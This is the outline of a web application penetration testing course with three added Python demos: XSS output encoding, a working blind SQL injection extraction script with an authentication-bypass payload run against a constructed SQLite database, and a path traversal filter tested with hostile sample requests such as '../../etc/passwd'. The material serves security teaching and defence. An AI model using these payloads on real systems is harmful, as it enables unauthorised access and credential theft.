WAPT

The document outlines a comprehensive curriculum for web application penetration testing, covering various modules including web application basics, information gathering, and specific attack vectors like Cross-Site Scripting and SQL Injection. Each module delves into essential concepts, techniques, and mitigation strategies relevant to web security. The content is structured to provide a thorough understanding of vulnerabilities and how to exploit or defend against them.

WEB APPLICATION PENETRATION TESTING

•Module 1: Introduction to Web Applications
•Module 2: Information Gathering
•Module 3: Cross-Site Scripting
•Module 4: SQL Injection
•Module 5: Authentication and Authorization
•Module 6: File and Resource Attacks
•Module 7: Web Services
•Module 8: XPath Injection

0x01: INTRODUCTION TO WEB APPLICATIONS

1.Introduction to Web Applications

1.1.HTTP/S Protocol Basics
• 1.1.1.HTTP Request
• 1.1.2.HTTP Response
• 1.1.3.HTTP Header Field Definitions
• 1.1.4.HTTPS
1.2.Encoding
• 1.2.1.Introduction
• 1.2.2.Charset
• 1.2.2.1.ASCII
• 1.2.2.2.Unicode
• 1.2.3.Charset vs. Charset Encoding
• 1.2.3.1.Unicode Encoding
• 1.2.3.2.HTML Encoding (HTML Entities)
• 1.2.3.3.URL Encoding (percent encoding)
• 1.2.3.4.Base64
1.3.Same Origin Policy
• 1.3.1.Origin definition
• 1.3.2.What does SOP protect from?
• 1.3.3.How SOP works
• 1.3.4.Exceptions
• 1.3.4.1.window.location
• 1.3.4.2.document.domain
• 1.3.4.3.Cross window messaging
• 1.3.4.4.Cross Origin Resource Sharing (CORS)
1.4.Cookies
• 1.4.1.Cookie Domain
• 1.4.1.1.Specified cookie domain
• 1.4.1.2.Unspecified cookie domain
• 1.4.1.3.Internet Explorer Exception
• 1.4.2.Inspecting the Cookie Protocol
• 1.4.2.1.Login
• 1.4.2.2.Set-Cookie
• 1.4.2.3.Cookie
• 1.4.3.Cookie Installation
• 1.4.3.1.Correct cookie installation
• 1.4.3.2.Incorrect cookie installation
1.5.Sessions
1.6.Web Application Proxies
• 1.6.1.Burp Suite
• 1.6.2.OWASP ZAP
0x02: INFORMATION GATHERING

2.Information Gathering
2.1.Gathering information on your target
• 2.1.1.Finding owner, IP and emails
• 2.1.1.1.Whois
  • Command line
  • Web based tool
• 2.1.1.2.DNS
• 2.1.1.3.Nslookup (find target ISP, Netcraft)
2.2.Infrastructure
• 2.2.1.Fingerprinting the web server
• 2.2.1.1.Netcat
• 2.2.1.2.WhatWeb
• 2.2.1.3.Wappalyzer
• 2.2.1.4.Web server modules
• 2.2.2.Enumerating subdomains
• 2.2.2.1.Netcraft
• 2.2.2.2.Google
• 2.2.2.3.Subbrute
• 2.2.2.4.Dnsrecon
• 2.2.2.5.TheHarvester
• 2.2.2.6.Zone transfer
• 2.2.3.Finding virtual hosts
2.3.Fingerprinting frameworks and applications
• 2.3.1.Third party add-ons
• 2.3.2.Mapping results
2.4.Fingerprinting custom applications
• 2.4.1.Burp target crawler
• 2.4.2.Creating a functional graph
• 2.4.3.Mapping the attack surface
• 2.4.3.1.Client side validation
• 2.4.3.2.Database interaction
• 2.4.3.3.File uploading and downloading
• 2.4.3.4.Display of user-supplied data
• 2.4.3.5.Redirections
• 2.4.3.6.Access control and login-protected pages
• 2.4.3.7.Error messages
• 2.4.3.8.Charting

2.5.Enumerating resources
• 2.5.1.Crawling the website
• 2.5.2.Finding hidden files
• 2.5.2.1.Back up and source code
• 2.5.2.2.Enumerating user accounts
• 2.5.2.3.Map
2.6.Relevant information through misconfigurations
• 2.6.1.Directory listing
• 2.6.2.Log and configuration files
• 2.6.3.HTTP verbs and file upload
2.7.Google hacking
• 2.7.1.Search operators
2.8.Shodan HQ

0x03: CROSS-SITE SCRIPTING


3.1.Cross-Site Scripting
• 3.1.1.Basics
3.2.Anatomy of an XSS Exploitation
3.3.The three types of XSS
• 3.3.1.Reflected XSS
• 3.3.2.Persistent XSS
• 3.3.3.DOM-based XSS
3.4.Finding XSS
• 3.4.1.Finding XSS in PHP code
3.5.XSS Exploitation
• 3.5.1.XSS and Browsers
• 3.5.2.XSS Attacks
• 3.5.2.1.Cookie Stealing through XSS
• 3.5.2.2.Defacement
• 3.5.2.3.XSS for advanced phishing attacks
• 3.5.2.4.BeEF
3.6.Mitigation
• 3.6.1.Input Validation
• 3.6.2.Context-Aware output encoding
• 3.6.3.Never trust user input
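Worked example for 3.6.2 (context-aware output encoding), added here and not part of the course material: the same attacker string is reflected into an HTML body, a quoted attribute, a JavaScript string literal and a URL parameter, first raw (the reflected XSS of 3.3.1) and then through the encoder that matches each context. The template, the `render_*`/`enc_*` helper names and the payload are constructed for the demo.

```python
import html
import json
import urllib.parse

# Constructed attacker input used to probe every context below.
PAYLOAD = '"><script>alert(1)</script>'


def render_vulnerable(name: str) -> str:
    """Reflected XSS (3.3.1): user input lands raw in four different contexts."""
    return (f'<p>Hello {name}</p>\n'                         # HTML body
            f'<input value="{name}">\n'                      # quoted attribute
            f'<script>var user = "{name}";</script>\n'       # JS string literal
            f'<a href="/profile?user={name}">me</a>')        # URL parameter


def enc_html(s: str) -> str:
    """HTML body and quoted-attribute context: entity-encode the ampersand,
    both angle brackets and both quote characters."""
    return html.escape(s, quote=True)


def enc_js_string(s: str) -> str:
    """JavaScript string-literal context: JSON-encode (handles quotes,
    backslashes and control characters) and additionally \\u-escape < > &
    so the HTML parser can never see a </script> or <!-- inside the literal."""
    body = json.dumps(s)[1:-1]          # drop the surrounding JSON quotes
    return (body.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


def enc_url_param(s: str) -> str:
    """URL query-string component: percent-encode every reserved character."""
    return urllib.parse.quote(s, safe="")


def render_safe(name: str) -> str:
    """Same template, each insertion point encoded for its own context (3.6.2)."""
    return (f'<p>Hello {enc_html(name)}</p>\n'
            f'<input value="{enc_html(name)}">\n'
            f'<script>var user = "{enc_js_string(name)}";</script>\n'
            f'<a href="/profile?user={enc_url_param(name)}">me</a>')


def injected_tags(page: str) -> int:
    """Number of <script>/</script> tags beyond the template's own pair."""
    return page.count("<script>") + page.count("</script>") - 2


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD), "\ninjected tags:", injected_tags(render_vulnerable(PAYLOAD)))
    print(render_safe(PAYLOAD), "\ninjected tags:", injected_tags(render_safe(PAYLOAD)))
```

The point of the JavaScript encoder is that JSON encoding alone is not enough: `</script>` inside a JS string still terminates the script block for the HTML parser, which is why the angle brackets are turned into `\u003c`/`\u003e` as well.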

0x04: SQL INJECTION


4.SQL Injection
• 4.1.Introduction to SQL Injections
• 4.1.1.SQL Statements
• 4.1.1.1.SELECT
• 4.1.1.2.UNION
4.1.2.SQL Queries inside web applications
4.1.3.Vulnerable dynamic queries
4.1.4.How dangerous is a SQL Injection
4.1.5.SQLi attacks classification
• 4.1.5.1.In-band SQLi
• 4.1.5.2.Error-based SQLi
• 4.1.5.3.Blind SQLi
4.2.Finding SQL Injections
4.2.1.Simple SQL Injection scenario
4.2.2.SQL errors in web applications
4.2.3.Boolean-based detection
• 4.2.3.1.Example
4.3.Exploiting In-band SQL Injections
• 4.3.1.First scenario
• 4.3.2.In-band attack challenges
• 4.3.3.Enumerating the number of fields in a query
• 4.3.3.1.Different DBMS UNION mismatch errors
4.3.4.Blind enumeration
4.3.5.Identifying field types
4.3.6.Dumping the database content
4.4.Exploiting Error-based SQL Injections
• 4.4.1.MS SQL Server Error-based exploitation
• 4.4.2.The CAST Technique
• 4.4.3.Finding the DBMS version
• 4.4.4.Dumping the database data
• 4.4.4.1.Finding the current username
• 4.4.4.2.Finding readable databases
• 4.4.4.3.Enumerating database tables
• 4.4.4.4.Enumerating columns
• 4.4.4.5.Dumping data
4.4.5. ()
4.4.6.MySQL Error-based SQLi
4.4.7.PostgreSQL Error-based SQLi
4.4.8.Developing Error-based SQLi Payloads
4.5.Exploiting blind SQLi
• 4.5.1.String extraction
• 4.5.2.Detecting the current user
• 4.5.3.Scripting blind SQLi data dump
• 4.5.4.Exploiting blind SQLi
• 4.5.4.1.String extraction
4.5.5.Optimize blind SQLi
4.5.6.Time-based blind SQLi
4.6.SQLMap
• 4.6.1.Basic syntax
• 4.6.2.Extracting the database banner
• 4.6.3.Information Gathering
• 4.6.4.Extracting the Database
• 4.6.5.Extracting the Schema
• 4.6.6.SQLMap Advanced Usage
• 4.6.6.1.Forcing the DBMS
• 4.6.6.2.Fine tuning the payloads
• 4.6.6.3.Aggressiveness and load

4.7.Mitigation Strategies
• 4.7.1.Prepared statements
• 4.7.1.1.Implementation
4.7.2.Type casting
4.7.3.Input validation
4.8.From SQLi to Server Takeover
• 4.8.1.Advanced MS SQL Server Exploitation
• 4.8.1.1.xp_cmdshell
• 4.8.1.2.Internal Network Host Enumeration
• 4.8.1.3.Port Scanning
• 4.8.1.4.Reading the File System
• 4.8.1.5.Uploading Files
• 4.8.1.6.Storing Command Results into a Temporary Table
4.8.2.Advanced MySQL Exploitation
• 4.8.2.1.Reading the File System
• 4.8.2.2.Uploading Files
• 4.8.2.3.Executing Shell Commands
4.8.3.Conclusions
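Worked example covering 4.1.3 (vulnerable dynamic query), 4.2.3 (boolean-based detection), 4.5.1/4.5.3/4.5.5 (blind string extraction, scripted and optimised) and 4.7.1 (prepared statements), added here and not taken from the course: an in-memory SQLite database stands in for the vulnerable login page, the attacker-side script asks it one true/false question per request and recovers strings with a binary search over the character code, and the fixed login shows the same query with bound parameters. The table, accounts and secrets are constructed for the demo; the `oracle`/`extract_string` names are made up.

```python
import sqlite3

# Constructed stand-in for the vulnerable web application: an in-memory
# SQLite database with a users table. Names and secrets are made up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "S3cr3t!"), (2, "bob", "hunter2")])

STATS = {"requests": 0}   # how many "HTTP requests" the last extraction needed


def login_vulnerable(username: str, password: str) -> bool:
    """Vulnerable dynamic query (4.1.3): input is concatenated into the SQL."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(username: str, password: str) -> bool:
    """Prepared statement (4.7.1): same query, input passed as bound parameters."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def oracle(condition: str) -> bool:
    """Boolean-based detection (4.2.3): one true/false question per request.
    The username closes the string literal, ANDs our condition onto the
    admin row and comments out the password check."""
    STATS["requests"] += 1
    return login_vulnerable(f"admin' AND ({condition}) -- ", "irrelevant")


def extract_string(expr: str, max_len: int = 64) -> str:
    """Blind string extraction (4.5.1) optimised with a binary search over
    the character code (4.5.5): 7 requests per character instead of up to
    127 with a linear scan. `expr` is any SQL expression evaluated on the
    admin row: a column name or a scalar subquery."""
    STATS["requests"] = 0
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break                          # past the end of the string
        lo, hi = 0, 127                    # assume 7-bit ASCII content
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("auth bypass:", login_vulnerable("admin' -- ", "wrong"))
    print("fixed login:", login_fixed("admin' -- ", "wrong"))
    print("admin password:", extract_string("password"),
          "in", STATS["requests"], "requests")
    print("user with id 2:", extract_string("(SELECT username FROM users WHERE id = 2)"))
```

Against a real target `login_vulnerable` becomes an HTTP request and the oracle checks the response (a "welcome" page versus an error); the extraction logic is unchanged, which is what 4.5.3 means by scripting the dump. `unicode()`/`substr()`/`length()` are SQLite names; MySQL uses `ASCII()`/`SUBSTRING()`, MS SQL Server `ASCII()`/`SUBSTRING()`/`LEN()`.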

0x05: AUTHENTICATION AND AUTHORIZATION

5.1.Introduction
• 5.1.1.Authentication vs. Authorization
• 5.1.2.Authentication factors
• 5.1.2.1.Single-factor authentication
• 5.1.2.2.Two-factor authentication
5.2.Common Vulnerabilities
• 5.2.1.Credentials over unencrypted channel
• 5.2.2.Inadequate password policy
• 5.2.2.1.Dictionary attacks
• 5.2.2.2.Brute force attacks

5.2.3.User enumeration
• 5.2.3.1.Via error messages
• 5.2.3.2.Via website behavior
• 5.2.3.3.Via timing attacks
• 5.2.3.4.Taking advantage of user enumeration
5.2.4.Default or easily-guessable user accounts
5.2.5.The remember me functionality
• 5.2.5.1.Cache browser method
• 5.2.5.2.Cookie method
• 5.2.5.3.Web storage method
• 5.2.5.4.Best defensive techniques
5.2.6.Password reset feature
• 5.2.6.1.Easily guessable answers
• 5.2.6.2.Unlimited attempts
• 5.2.6.3.Password reset link
5.2.7.Logout weaknesses
• 5.2.7.1.Incorrect session destruction

5.3.Bypassing Authorization
• 5.3.1.Insecure direct object references
• 5.3.1.1.Best defensive techniques
• 5.3.2.Missing function level access control
5.3.3.Parameter modification
• 5.3.3.1.Vulnerable web application
5.3.4.Incorrect redirection
• 5.3.4.1.Redirect to protected contents
• 5.3.4.2.Best defensive techniques
5.3.5.Session ID prediction
5.3.6.SQL Injections
5.3.7.Local file inclusion and path traversal

0x06: FILE AND RESOURCE ATTACKS


6.File and Resource Attacks
6.1.Path Traversal
• 6.1.1.Path conversion
• 6.1.2.Encoding
• 6.1.3.Best defensive techniques
6.2.File Inclusion Vulnerabilities
• 6.2.1.Local File Inclusion (LFI)
• 6.2.2.Remote File Inclusion (RFI)
6.3.Unrestricted File Upload
• 6.3.1.Vulnerable web application
• 6.3.1.1.The attack
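Worked example for 6.1.1 to 6.1.3 (path conversion, encoding, best defensive technique), added here and not part of the course: a file-serving check that first canonicalises the requested path the way a server would (repeated percent-decoding to catch double encoding, backslash to slash conversion, null-byte rejection, `..` collapsing) and only then verifies that the resolved path is still inside the web root. The temporary web root, the sample requests and the `safe_path`/`check` helper names are constructed for the demo.

```python
import os
import posixpath
import tempfile
import urllib.parse
from typing import Optional

# Constructed web root with one legitimate file, created in a temp dir.
WEB_ROOT = tempfile.mkdtemp(prefix="wapt_demo_")
with open(os.path.join(WEB_ROOT, "index.html"), "w") as fh:
    fh.write("<h1>demo</h1>")


def fully_decode(p: str, rounds: int = 3) -> str:
    """Encoding (6.1.2): attackers stack percent-encoding (%2e%2e%2f,
    %252e%252e%252f) hoping one layer survives the server's decoder.
    Decode until the value stops changing, with a cap against abuse."""
    for _ in range(rounds):
        d = urllib.parse.unquote(p)
        if d == p:
            break
        p = d
    return p


def safe_path(web_root: str, requested: str) -> Optional[str]:
    """Best defensive technique (6.1.3): canonicalise first, then check the
    *resolved* path is inside web_root. Returns the absolute path to serve,
    or None when the request must be refused."""
    decoded = fully_decode(requested).replace("\\", "/")   # path conversion (6.1.1)
    if "\x00" in decoded:                                  # null-byte truncation trick
        return None
    rel = posixpath.normpath(decoded)                      # collapse ./ and ../
    full = os.path.realpath(os.path.join(web_root, rel))   # also resolves symlinks
    root = os.path.realpath(web_root)
    if full != root and not full.startswith(root + os.sep):
        return None                                        # escaped the web root
    return full


def check(requested: str) -> str:
    """Demo helper: 'SERVE <path relative to the root>' or 'REJECT'."""
    full = safe_path(WEB_ROOT, requested)
    if full is None:
        return "REJECT"
    return "SERVE " + os.path.relpath(full, os.path.realpath(WEB_ROOT))


if __name__ == "__main__":
    # Constructed sample requests: benign, traversal, single/double encoded,
    # Windows separators, absolute path and null-byte suffix.
    for req in ["index.html", "static/../index.html", "../../etc/passwd",
                "%2e%2e/%2e%2e/etc/passwd",
                "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
                "..\\..\\etc\\passwd", "/etc/passwd", "index.html%00.jpg"]:
        print(f"{req!r:50} -> {check(req)}")
```

The order matters: a deny-list on the raw string (`".." in requested`) misses every encoded variant, whereas decoding and resolving first and then comparing prefixes against the real root catches them all, including the absolute-path case that `os.path.join` silently honours.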

0x07: WEB SERVICES


7.Web Services
7.1.Introduction
7.2.Web Services Implementations
• 7.2.1.XML-RPC
• 7.2.2.JSON-RPC
• 7.2.3.SOAP
• 7.2.4.RESTful

0x08: XPATH INJECTION


8.XPath Injection
8.1.XML Documents and Databases
8.2.XPath
• 8.2.1.XPath expression and syntax
• 8.2.2.XPath vs. SQL
8.3.Detecting XPath Injection
8.3.1.Error-based injection
8.3.2.Blind injection
• 8.3.2.1.Detect true condition
• 8.3.2.2.Detect false condition
8.3.3.Exploitation
• 8.3.3.1.Bypass XPath query
• 8.3.3.2.Extracting the XML document structure
• 8.3.3.3.Finding out the root node
• 8.3.3.4.Finding the first child node name
• 8.3.3.5.Finding the content of a node
